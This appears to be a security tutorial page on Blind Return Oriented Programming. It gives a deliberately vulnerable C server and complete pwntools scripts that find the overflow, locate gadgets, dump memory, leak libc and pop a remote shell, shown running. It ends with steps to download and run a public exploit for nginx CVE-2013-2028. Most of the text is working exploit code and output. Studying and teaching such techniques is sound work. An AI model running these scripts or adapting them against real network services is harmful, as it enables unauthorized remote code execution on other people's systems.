Excuse the ads! We need some help to keep our site up.

List

BROP(Blind Return Oriented Programming)

BROP struct

Number of registersROP structure
1pop register + ret
2pop register * 2 + ret
3pop register * 3 + ret
4pop register * 4 + ret
5pop register * 5 + ret
6pop register * 6 + ret
gdb-peda$ x/7i 0x4007ba
   0x4007ba <__libc_csu_init+90>:	pop    rbx
   0x4007bb <__libc_csu_init+91>:	pop    rbp
   0x4007bc <__libc_csu_init+92>:	pop    r12
   0x4007be <__libc_csu_init+94>:	pop    r13
   0x4007c0 <__libc_csu_init+96>:	pop    r14
   0x4007c2 <__libc_csu_init+98>:	pop    r15
   0x4007c4 <__libc_csu_init+100>:	ret    
gdb-peda$ 
gdb-peda$ x/2i 0x4007ba + 9
   0x4007c3 <__libc_csu_init+99>:	pop    rdi
   0x4007c4 <__libc_csu_init+100>:	ret    
gdb-peda$ x/3i 0x4007ba + 7
   0x4007c1 <__libc_csu_init+97>:	pop    rsi
   0x4007c2 <__libc_csu_init+98>:	pop    r15
   0x4007c4 <__libc_csu_init+100>:	ret    
gdb-peda$ 

Find BROP

Number of registersROP structure
1BROP Address + p64(0x41) + Stop Gadget
2BROP Address + p64(0x41) * 2 + Stop Gadget
3BROP Address + p64(0x41) * 3 + Stop Gadget
4BROP Address + p64(0x41) * 4 + Stop Gadget
5BROP Address + p64(0x41) * 5 + Stop Gadget
6BROP Address + p64(0x41) * 6 + Stop Gadget
Number of registersROP structure
1BROP Address + p64(0x41)
2BROP Address + p64(0x41) * 2
3BROP Address + p64(0x41) * 3
4BROP Address + p64(0x41) * 4
5BROP Address + p64(0x41) * 5
6BROP Address + p64(0x41) * 6

Proof of concept

Example code

//gcc -fno-stack-protector brop.c -o brop
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int i;
int check();
int main(void){
	setbuf(stdin,NULL);
	setbuf(stdout,NULL);
	setbuf(stderr,NULL);
    puts("WelCome my friend,Do you know password?");
	if(!check()){
        puts("Do not dump my memory");
	}else {
        puts("No password, no game");
	}
}
int check(){
    char buf[50];
    read(STDIN_FILENO,buf,1024);
    return strcmp(buf,"aslvkm;asd;alsfm;aoeim;wnv;lasdnvdljasd;flk");
}

Test server settings

#!/bin/sh
while true; do
    num=`ps -ef | grep "socat" | grep -v "grep" | wc -l`
    if [ $num -eq 0 ]; then
        socat tcp4-listen:10001,reuseaddr,fork exec:./brop &
    fi
done
lazenca0x0@ubuntu:~/Exploit/BROP$ ./run.sh 

Check Overflow

from pwn import *

ip = '127.0.0.1'
port = 10001

def check_Overflow():
    for i in range(1,4096):
        try:
            r = remote(ip,port,level='error')
            response = r.recvuntil('WelCome my friend,Do you know password?\n')            
            r.send("A" * i)
            response = r.recv()
            r.close()
            if 'No password, no game' in response:
                i += 1
            else:
                r.close
                return i

        except EOFError as e:
            r.close()
            return i - 1


size = check_Overflow()
log.info('Overflow size : ' + str(size))
lazenca0x0@ubuntu:~/Exploit/BROP$ python ./check_overflow.py 
[*] Overflow size : 72

Check stop gadget

base = 0x400000

def find_stop_gadget(size):
    p = log.progress("Searching for Stop gadget ") 

    for offset in range(1,0x1000):
        addr = int(base + offset)
         
        payload = ''
        payload += 'A' * size
        payload += p64(addr)
         
        if offset % 0x100 == 0:
            log.info(" Progressed to 0x%x" % offset)
 
        try:
            r = remote(ip,port,level='error')
            r.recvuntil('WelCome my friend,Do you know password?\n')
            r.send(payload)
            response  = r.recv(timeout=0.2)
            r.close()
 
            if 'WelCome my friend,Do you know password?' in response:
                p.success("Done")
                log.info("Stop address: " +  hex(addr))
                return addr
        except Exception as e:
            r.close()
lazenca0x0@ubuntu:~/Exploit/BROP$ python ./find_stop_gadget.py 
[*] Overflow size : 72
[+] Searching for Stop gadget : Done
[*]  Progressed to 0x100
[*]  Progressed to 0x200
[*]  Progressed to 0x300
[*]  Progressed to 0x400
[*]  Progressed to 0x500
[*] Stop address: 0x4005c0
lazenca0x0@ubuntu:~/Exploit/BROP$ gdb -q ./brop
Reading symbols from ./brop...(no debugging symbols found)...done.
gdb-peda$ x/10i 0x4005c0
   0x4005c0 <_start>:	xor    ebp,ebp
   0x4005c2 <_start+2>:	mov    r9,rdx
   0x4005c5 <_start+5>:	pop    rsi
   0x4005c6 <_start+6>:	mov    rdx,rsp
   0x4005c9 <_start+9>:	and    rsp,0xfffffffffffffff0
   0x4005cd <_start+13>:	push   rax
   0x4005ce <_start+14>:	push   rsp
   0x4005cf <_start+15>:	mov    r8,0x4007d0
   0x4005d6 <_start+22>:	mov    rcx,0x400760
   0x4005dd <_start+29>:	mov    rdi,0x4006b6
gdb-peda$ 

Check BROP gadget

def maybe_BROP_gadget(size, stop_gadget, addr):
    try:
        payload = ''
        payload += 'A' * size 
        payload += p64(addr) 
        payload += p64(0) * 6 
        payload += p64(stop_gadget)

        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')       
        r.sendline(payload)
        response = r.recv(timeout=0.2)

        r.close()
        
        if 'WelCome my friend,Do you know password?' in response:
            return True
        return False

    except Exception as e:
	    r.close()
        return False
def is_BROP_gadget(size,addr):
    try:
        payload = ''
        payload += 'A' * size 
        payload += p64(addr) 
        payload += p64(0x41) * 10

        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        response = r.recv()
        r.close()
        return False

    except Exception as e:

        return True
def find_brop_gadget(size,stop_gadget):
    p = log.progress("Searching for BROP gadget ") 
    for offset in range(0x1,0x1000):
        if offset % 0x100 == 0:
            log.info('Progressed to 0x%x' % offset)

        addr = int(base + offset)
        
        if maybe_BROP_gadget(size,stop_gadget,addr):
            log.info('Maybe BROP Gagget : ' + hex(int(base + offset)))
            if is_BROP_gadget(size, addr):
                p.success("Done")
                log.info('Finded BROP Gagget : ' + hex(int(base + offset)))
                return addr
lazenca0x0@ubuntu:~/Exploit/BROP$ python maybe_BROP_gadget.py 
[*] Overflow size : 72
[+] Searching for Stop gadget : Done
[*]  Progressed to 0x100
[*]  Progressed to 0x200
[*]  Progressed to 0x300
[*]  Progressed to 0x400
[*]  Progressed to 0x500
[*] Stop address: 0x4005c0
[+] Searching for BROP gadget : Done
[*] Progressed to 0x100
[*] Progressed to 0x200
[*] Progressed to 0x300
[*] Progressed to 0x400
[*] Progressed to 0x500
[*] Maybe BROP Gagget : 0x4005c0
[*] Maybe BROP Gagget : 0x4005c2
[*] Maybe BROP Gagget : 0x4005c3
[*] Maybe BROP Gagget : 0x4005c5
[*] Maybe BROP Gagget : 0x4005c6
[*] Maybe BROP Gagget : 0x4005c7
[*] Maybe BROP Gagget : 0x4005c9
[*] Maybe BROP Gagget : 0x4005cd
[*] Maybe BROP Gagget : 0x4005ce
[*] Maybe BROP Gagget : 0x4005cf
[*] Maybe BROP Gagget : 0x4005d0
[*] Maybe BROP Gagget : 0x4005d6
[*] Maybe BROP Gagget : 0x4005d7
[*] Maybe BROP Gagget : 0x4005dd
[*] Maybe BROP Gagget : 0x4005de
[*] Progressed to 0x600
[*] Maybe BROP Gagget : 0x4006b6
[*] Maybe BROP Gagget : 0x4006b7
[*] Maybe BROP Gagget : 0x4006b8
[*] Maybe BROP Gagget : 0x4006ba
[*] Maybe BROP Gagget : 0x4006ce
[*] Maybe BROP Gagget : 0x4006e2
[*] Maybe BROP Gagget : 0x4006f6
[*] Progressed to 0x700
[*] Maybe BROP Gagget : 0x4007ba
[*] Finded BROP Gagget : 0x4007ba
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3

Get puts@plt address

def find_puts_addr(size,stop_gadget,rdi_ret):
    p = log.progress("Searching for the address of puts@plt") 
    for offset in range(1,0x1000):
        addr = int(base + offset)

        payload = ''
        payload += 'A' * size + p64(rdi_ret) 
        payload += p64(0x400000) 
        payload += p64(addr) 
        payload += p64(stop_gadget)

        if offset % 0x100 == 0:
            print "[!] currently at 0x%x" % offset

        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        try:
            response = r.recv()
            if response.startswith('\x7fELF'):
                log.info('find puts@plt addr: 0x%x' % addr)
                return addr
            r.close()
            addr += 1
        except Exception as e:
            r.close()
            addr += 1
lazenca0x0@ubuntu:~/Exploit/BROP$ python find_puts_addr.py 
[*] Overflow size : 72
[+] Searching for Stop gadget : Done
[*]  Progressed to 0x100
[*]  Progressed to 0x200
[*]  Progressed to 0x300
[*]  Progressed to 0x400
[*]  Progressed to 0x500
[*] Stop address: 0x4005c0
[+] Searching for BROP gadget : Done
[*] Progressed to 0x100
[*] Progressed to 0x200
[*] Progressed to 0x300
[*] Progressed to 0x400
[*] Progressed to 0x500
[*] Maybe BROP Gagget : 0x4005c0
[*] Maybe BROP Gagget : 0x4005c2
[*] Maybe BROP Gagget : 0x4005c3
[*] Maybe BROP Gagget : 0x4005c5
[*] Maybe BROP Gagget : 0x4005c6
[*] Maybe BROP Gagget : 0x4005c7
[*] Maybe BROP Gagget : 0x4005c9
[*] Maybe BROP Gagget : 0x4005cd
[*] Maybe BROP Gagget : 0x4005ce
[*] Maybe BROP Gagget : 0x4005cf
[*] Maybe BROP Gagget : 0x4005d0
[*] Maybe BROP Gagget : 0x4005d6
[*] Maybe BROP Gagget : 0x4005d7
[*] Maybe BROP Gagget : 0x4005dd
[*] Maybe BROP Gagget : 0x4005de
[*] Progressed to 0x600
[*] Maybe BROP Gagget : 0x4006b6
[*] Maybe BROP Gagget : 0x4006b7
[*] Maybe BROP Gagget : 0x4006b8
[*] Maybe BROP Gagget : 0x4006ba
[*] Maybe BROP Gagget : 0x4006ce
[*] Maybe BROP Gagget : 0x4006e2
[*] Maybe BROP Gagget : 0x4006f6
[*] Progressed to 0x700
[*] Maybe BROP Gagget : 0x4007ba
[*] Finded BROP Gagget : 0x4007ba
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3
[▖] Searching for the address of puts@plt
[*] currently at 0x100
[*] currently at 0x200
[*] currently at 0x300
[*] currently at 0x400
[*] currently at 0x500
find puts@plt addr: 0x400555
[+] Puts plt : 0x400555

Dump memory

def memory_dump(size,stop_gadget,rdi_ret,put_plt):
    now = base
    end = 0x401000
    dump = ""
 
    p = log.progress("Memory dump") 
    while now < end:
        if now % 0x100 == 0:
            log.info("Progressed to  0x%x" % now)
 
        payload = ''
        payload += 'A' * size
        payload += p64(rdi_ret)
        payload += p64(now)
        payload += p64(puts_plt)
        payload += p64(stop_gadget)
 
        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        try:
            data = r.recv(timeout=0.5)
            r.close()
 
            data = data[:data.index("\nWelCome")]           
        except ValueError as e:
            data = data
        except Exception as e:
            continue
         
        if len(data.split()) == 0:
            data = '\x00'
 
        dump += data
        now += len(data)
         
    
    with open('memory.dump','wb') as f:
        f.write(dump)

    p.success("Done")
lazenca0x0@ubuntu:~/Exploit/BROP$ python memory_dump.py 
[*] Overflow size : 72
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3
[+] Puts plt : 0x400555
[+] Memory dump: Done
[*] Progressed to  0x400000
[*] Progressed to  0x400100
[*] Progressed to  0x400200
[*] Progressed to  0x400300
[*] Progressed to  0x400400
[*] Progressed to  0x400500
[*] Progressed to  0x400900
[*] Progressed to  0x400a00
[*] Progressed to  0x400b00
[*] Progressed to  0x400c00
[*] Progressed to  0x400d00
[*] Progressed to  0x400e00
[*] Progressed to  0x400f00
lazenca0x0@ubuntu:~/Exploit/BROP$ ls
brop  BROP.py  libc  memory.dump  run.sh
lazenca0x0@ubuntu:~/Exploit/BROP$ file memory.dump 
memory.dump: ERROR: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked error reading (Invalid argument)
lazenca0x0@ubuntu:~/Exploit/BROP$

Get puts@got address

lazenca0x0@ubuntu:~/Exploit/BROP$ r2 -B 0x400000 memory.dump
Warning: Cannot initialize program headers
Warning: read (shdr) at 0x1b30
Warning: Cannot initialize section headers
Warning: Cannot initialize strings table
Warning: read (init_offset)
Warning: read (main)
Warning: read (get_fini)
[0x008005c0]> pd 10 @ 0x400555
            0x00400555    00ff         add bh, bh
            0x00400557    25b40a2000   and eax, 0x200ab4
            0x0040055c    0f1f4000     nop [rax]
            0x00400560    ff25b20a2000 jmp qword [rip+0x200ab2]
            0x00400566    6800000000   push 0x0
            0x0040056b    e9e0ffffff   jmp 0x400550
            0x00400570    ff25aa0a2000 jmp qword [rip+0x200aaa]
            0x00400576    6801000000   push 0x1 ; 0x00000001 
            0x0040057b    e9d0ffffff   jmp 0x400550
            0x00400580    ff25a20a2000 jmp qword [rip+0x200aa2]
[0x008005c0]> ? 0x00400566 + 0x200ab2
6295576 0x601018 030010030 6.0M 60000:0018 6295576 00011000 6295576.0 0.000000

Leak address

def leak_libc(r,size,stop_gadget,rdi_ret,put_plt,puts_got):
    payload = ''
    payload += 'A' * size
    payload += p64(rdi_ret)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(stop_gadget)
    
    r.recvuntil('WelCome my friend,Do you know password?\n')
    r.sendline(payload)
    leakAddr = r.recvuntil("\nWelCome my friend,Do you know password?\n", drop=True)
    leakAddr = u64(leakAddr.ljust(8, '\x00'))
    return leakAddr
lazenca0x0@ubuntu:~/Exploit/BROP$ python leak_address.py 
[*] Overflow size : 72
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3
[+] Puts plt : 0x400555
[*] Address of puts in libc : 0x7f760f884690
lazenca0x0@ubuntu:~/Exploit/BROP$

Libc Search

lazenca0x0@ubuntu:~/Exploit/BROP/libc/libc-database$ ./add /usr/lib/libc-2.26.so
lazenca0x0@ubuntu:~/Exploit/BROP/libc/libc-database$ ./find puts 690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
lazenca0x0@ubuntu:~/Exploit/BROP/libc/libc-database$ ./dump libc6_2.23-0ubuntu10_amd64
offset___libc_start_main_ret = 0x20830
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f7970
offset_read = 0x00000000000f7250
offset_write = 0x00000000000f72b0
offset_str_bin_sh = 0x18cd57
lazenca0x0@ubuntu:~/Exploit/BROP/libc/libc-database$ ./dump libc6_2.23-0ubuntu10_amd64 puts
offset_puts = 0x000000000006f690
lazenca0x0@ubuntu:~/Exploit/BROP/libc/libc-database$ 
from LibcSearcher import *

lib = LibcSearcher('puts', addr_puts_libc)
libcBase = addr_puts_libc - lib.dump('puts')
system_addr = libcBase + lib.dump('system')
binsh_addr = libcBase + lib.dump('str_bin_sh')

log.info('libc base : ' + hex(libcBase))
log.info('system : ' + hex(system_addr))
log.info('binsh : ' + hex(binsh_addr))
lazenca0x0@ubuntu:~/Exploit/BROP$ python libc_search.py
[*] Overflow size : 72
[*] STOP Gadget : 0x4005c0
[*] BROP Gadget : 0x4007ba
[*] RDI Gadget : 0x4007c3
[*] Puts plt : 0x400555
[+] ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) be choosed.
[*] libc base : 0x7fc974723000
[*] system : 0x7fc974768390
[*] binsh : 0x7fc9748afd57

Exploit code

from pwn import *
from LibcSearcher import *
 
#context.log_level = 'debug'
ip = '127.0.0.1'
port = 10001
base = 0x400000
 
def find_stop_gadget(size):
    p = log.progress("Searching for Stop gadget ") 

    for offset in range(1,0x1000):
        addr = int(base + offset)
         
        payload = ''
        payload += 'A' * size
        payload += p64(addr)
         
        if offset % 0x100 == 0:
            log.info(" Progressed to 0x%x" % offset)
 
        try:
            r = remote(ip,port,level='error')
            r.recvuntil('WelCome my friend,Do you know password?\n')
            r.send(payload)
            response  = r.recv(timeout=0.2)
            r.close()
 
            if 'WelCome my friend,Do you know password?' in response:
                p.success("Done")
                log.info("Stop address: " +  hex(addr))
                r.close()
                return addr
        except Exception as e:
            r.close()

def check_Overflow():
    for i in range(1,4096):
        try:
            r = remote(ip,port,level='error')
            response = r.recvuntil('WelCome my friend,Do you know password?\n')           
            r.send("A" * i)
            response = r.recv()
            r.close()
            if 'No password, no game' in response:
                i += 1
            else:
                r.close()
                return i
 
        except EOFError as e:
            r.close()
            return i - 1
 
def maybe_BROP_gadget(size, stop_gadget, addr):
    try:
        payload = ''
        payload += 'A' * size 
        payload += p64(addr) 
        payload += p64(0) * 6 
        payload += p64(stop_gadget)

        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')       
        r.sendline(payload)
        response = r.recv(timeout=0.2)

        r.close()
        
        if 'WelCome my friend,Do you know password?' in response:
            return True
        return False

    except Exception as e:
	r.close()
        return False

def is_BROP_gadget(size,addr):
    try:
        payload = ''
        payload += 'A' * size 
        payload += p64(addr) 
        payload += p64(0x41) * 10

        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        response = r.recv()
        r.close()
        return False

    except Exception as e:
	r.close()
        return True

def find_brop_gadget(size,stop_gadget):
    p = log.progress("Searching for BROP gadget ") 
    for offset in range(0x1,0x1000):
        if offset % 0x100 == 0:
            log.info('Progressed to 0x%x' % offset)

        addr = int(base + offset)
        
        if maybe_BROP_gadget(size,stop_gadget,addr):
            log.info('Maybe BROP Gagget : ' + hex(int(base + offset)))
            if is_BROP_gadget(size, addr):
                p.success("Done")
                log.info('Finded BROP Gagget : ' + hex(int(base + offset)))
                return addr

def find_puts_addr(size,stop_gadget,rdi_ret):
    p = log.progress("Searching for the address of puts@plt") 
    for offset in range(1,0x1000):
        addr = int(base + offset)

        payload = ''
        payload += 'A' * size + p64(rdi_ret) 
        payload += p64(0x400000) 
        payload += p64(addr) 
        payload += p64(stop_gadget)

        if offset % 0x100 == 0:
            print "[!] currently at 0x%x" % offset

        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        try:
            response = r.recv()
            if response.startswith('\x7fELF'):
                log.info('find puts@plt addr: 0x%x' % addr)
                return addr
            r.close()
            addr += 1
        except Exception as e:
            r.close()
            addr += 1

def memory_dump(size,stop_gadget,rdi_ret,put_plt):
    now = base
    end = 0x401000
    dump = ""
 
    p = log.progress("Memory dump") 
    while now < end:
        if now % 0x100 == 0:
            log.info("Progressed to  0x%x" % now)
 
        payload = ''
        payload += 'A' * size
        payload += p64(rdi_ret)
        payload += p64(now)
        payload += p64(puts_plt)
        payload += p64(stop_gadget)
 
        r = remote(ip,port,level='error')
        r.recvuntil('WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        try:
            data = r.recv(timeout=0.5)
            r.close()
 
            data = data[:data.index("\nWelCome")]           
        except ValueError as e:
            data = data
        except Exception as e:
            continue
         
        if len(data.split()) == 0:
            data = '\x00'
 
        dump += data
        now += len(data)
         
    
    with open('memory.dump','wb') as f:
        f.write(dump)

    p.success("Done")

def leak_libc(r,size,stop_gadget,rdi_ret,put_plt,puts_got):
    payload = ''
    payload += 'A' * size
    payload += p64(rdi_ret)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(stop_gadget)
    
    r.recvuntil('WelCome my friend,Do you know password?\n')
    r.sendline(payload)
    leakAddr = r.recvuntil("\nWelCome my friend,Do you know password?\n", drop=True)
    leakAddr = u64(leakAddr.ljust(8, '\x00'))
    return leakAddr

size = check_Overflow()
log.info('Overflow size : ' + str(size))

stop_gadget = find_stop_gadget(size)
#stop_gadget = 0x4005c0

brop_gadget = find_brop_gadget(size, stop_gadget)
#brop_gadget = 0x4007ba
log.success('BROP Gadget : ' + hex(brop_gadget))
rdi_gadget = brop_gadget + 9
log.success('RDI Gadget : ' +hex(rdi_gadget))

puts_plt = find_puts_addr(size,stop_gadget,rdi_gadget)
#puts_plt = 0x400555
log.success('Puts plt : ' + hex(puts_plt))

#memory_dump(size,stop_gadget,rdi_gadget,puts_plt)
puts_got = 0x601018

r = remote(ip,port,level='error')
addr_puts_libc = leak_libc(r,size,stop_gadget,rdi_gadget,puts_plt,puts_got)
log.info('Address of puts in libc : ' + hex(addr_puts_libc))

lib = LibcSearcher('puts', addr_puts_libc)
libcBase = addr_puts_libc - lib.dump('puts')
system_addr = libcBase + lib.dump('system')
binsh_addr = libcBase + lib.dump('str_bin_sh')

log.info('libc base : ' + hex(libcBase))
log.info('system : ' + hex(system_addr))
log.info('binsh : ' + hex(binsh_addr))

payload = "A" * size
payload += p64(rdi_gadget)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += p64(stop_gadget)

r.sendline(payload)
r.interactive()
lazenca0x0@ubuntu:~/Exploit/BROP$ python BROP.py 
[+] Overflow size : 72
[*] Progressed to  0x100
[*] Progressed to  0x200
[*] Progressed to  0x300
[*] Progressed to  0x400
[*] Progressed to  0x500
[*] Stop address: 0x4005c0
[+] STOP Gadget : 0x4005c0
[*] Progressed to  0x100
[*] Progressed to  0x200
[*] Progressed to  0x300
[*] Progressed to  0x400
[*] Progressed to  0x500
[*] Maybe BROP Gagget : 0x4005c0
[*] Maybe BROP Gagget : 0x4005c2
[*] Maybe BROP Gagget : 0x4005c3
[*] Maybe BROP Gagget : 0x4005c5
[*] Maybe BROP Gagget : 0x4005c6
[*] Maybe BROP Gagget : 0x4005c7
[*] Maybe BROP Gagget : 0x4005c9
[*] Maybe BROP Gagget : 0x4005cd
[*] Maybe BROP Gagget : 0x4005ce
[*] Maybe BROP Gagget : 0x4005cf
[*] Maybe BROP Gagget : 0x4005d0
[*] Maybe BROP Gagget : 0x4005d6
[*] Maybe BROP Gagget : 0x4005d7
[*] Maybe BROP Gagget : 0x4005dd
[*] Maybe BROP Gagget : 0x4005de
[*] Progressed to  0x600
[*] Maybe BROP Gagget : 0x4006b6
[*] Maybe BROP Gagget : 0x4006b7
[*] Maybe BROP Gagget : 0x4006b8
[*] Maybe BROP Gagget : 0x4006ba
[*] Maybe BROP Gagget : 0x4006ce
[*] Maybe BROP Gagget : 0x4006e2
[*] Maybe BROP Gagget : 0x4006f6
[*] Progressed to  0x700
[*] Maybe BROP Gagget : 0x4007ba
[*] Finded BROP Gagget : 0x4007ba
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3
[*] Progressed to  0x100
[*] Progressed to  0x200
[*] Progressed to  0x300
[*] Progressed to  0x400
[*] Progressed to  0x500
[+] Puts plt : 0x400555
[+] ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) be choosed.
[+] libc base : 0x7f8e66eec000
[+] system : 0x7f8e66f31390
[+] binsh : 0x7f8e67078d57
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ 
lazenca0x0@ubuntu:~/Exploit/BROP$

CVE-2013-2028

Setting up the test environment

sudo apt-get update
sudo apt-get install libpcre3 libpcre3-dev
sudo apt-get install openssl libssl-dev
wget nginx.org/download/nginx-1.4.0.tar.gz 
tar zxvf nginx-1.4.0.tar.gz 
cd nginx-1.4.0 
./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
vi objs/Makefile
...
CFLAGS =  -pipe  -O -W -Wall -Wpointer-arith -Wno-unused -Werror -g -fstack-protector
...
make -j4
sudo make install
worker_processes  4;
sudo /usr/local/nginx/nginx

Download Exploit code

wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz 
tar zxvf nginx-1.4.0-exp.tgz 
cd nginx-1.4.0-exp 

Run Exploit code

./brop.rb 127.0.0.1

References